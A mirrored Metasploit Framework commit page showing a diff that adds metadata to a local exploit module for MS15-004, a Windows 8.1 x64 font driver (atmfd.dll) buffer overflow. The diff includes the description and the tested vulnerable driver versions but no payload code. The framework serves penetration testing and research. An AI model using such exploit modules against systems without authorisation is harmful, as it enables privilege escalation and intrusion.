1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Add metadata

This commit is contained in:
jvazquez-r7 2015-09-02 18:32:45 -05:00
parent 8f70ec8256
commit de25a6c23c
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83

View File

@ -18,10 +18,12 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows ...',
'Name' => 'MS15-004 Microsoft Windows Font Driver Buffer Overflow',
'Description' => %q{
This module ...
This module has been tested on vulnerable builds of Windows 8.1 x64.
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
a malformed font. The vulnerability was exploited by the hacking team and disclosed on
the july data leak. This module has been tested successfully on vulnerable builds of
Windows 8.1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
@ -37,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Local
'EXITFUNC' => 'thread',
},
'Targets' => [
# win32k.sys 6.3.9600.17393 / ntoskrnl.exe 6.3.9600.17415 / atmfd 5.1.2.238 (Works)
[ 'Windows 8.1 x64', { } ]
],
'Payload' => {
@ -56,8 +59,6 @@ class Metasploit3 < Msf::Exploit::Local
end
def check
# Windows 8.1 (64-bit) / atmfd 5.1.2.238 (Works)
# Windows 8.1
if sysinfo['OS'] !~ /Windows 8/i
return Exploit::CheckCode::Unknown